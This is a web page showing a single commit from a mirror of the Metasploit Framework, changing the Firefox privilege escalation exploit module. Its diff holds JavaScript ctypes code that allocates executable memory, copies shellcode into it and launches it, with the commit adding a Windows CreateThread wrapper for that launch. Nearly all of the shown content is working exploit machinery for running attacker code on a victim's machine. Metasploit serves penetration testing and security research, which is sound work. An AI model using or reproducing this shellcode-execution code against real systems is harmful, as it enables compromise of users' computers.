infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add CreateThread wrapper for windows.

bug/bundler_fix
Joe Vennix 2014-03-12 02:49:09 -05:00
parent ce0c5380a5
commit 7afcb6aee8
1 changed files with 12 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
View File

@ -52,9 +52,7 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
ctypes.voidptr_t, /* src */
ctypes.size_t /* size to copy */
);
var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0);
var pthread_buff = mmap(null, 4096, RWX, ANON_PRIVATE, 0, 0);
var cstr = ctypes.jschar.array()(shellcode);
//var bytes = ctypes.char.array()(shellcode).length-1;
memcpy(buff, cstr, bytes);
@ -81,12 +79,23 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
ctypes.voidptr_t, /* src */
ctypes.size_t /* size to copy */
);
var CreateThread = ctypes.open("Kernel32.dll").declare('CreateThread',
ctypes.winapi_abi, /* calling convention */
ctypes.voidptr_t, /* return type */
ctypes.voidptr_t, /* lpThreadAttributes */
ctypes.voidptr_t, /* dwStackSize */
ctypes.voidptr_t, /* lpStartAddress copy */
ctypes.voidptr_t, /* lpParameter */
ctypes.voidptr_t, /* dwCreationFlags */
ctypes.voidptr_t /* lpThreadId */
);
var buff = VirtualAlloc(null, shellcode.length, ANON_PRIVATE, RWX);
var cstr = ctypes.jschar.array()(shellcode);
memcpy(buff, cstr, bytes);
var m = buff.toString().match(/"0x([0-9a-fA-F]+)"/);
if (!m) throw new Error("Could not find address of buffer.");
ctypes.FunctionType(ctypes.winapi_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
var fn = ctypes.FunctionType(ctypes.winapi_abi, ctypes.void_t).ptr(parseInt(m[1], 16));
CreateThread(null, null, fn, null, null, null);
};
var i, errs = [], fns = [execWindows, execPosix];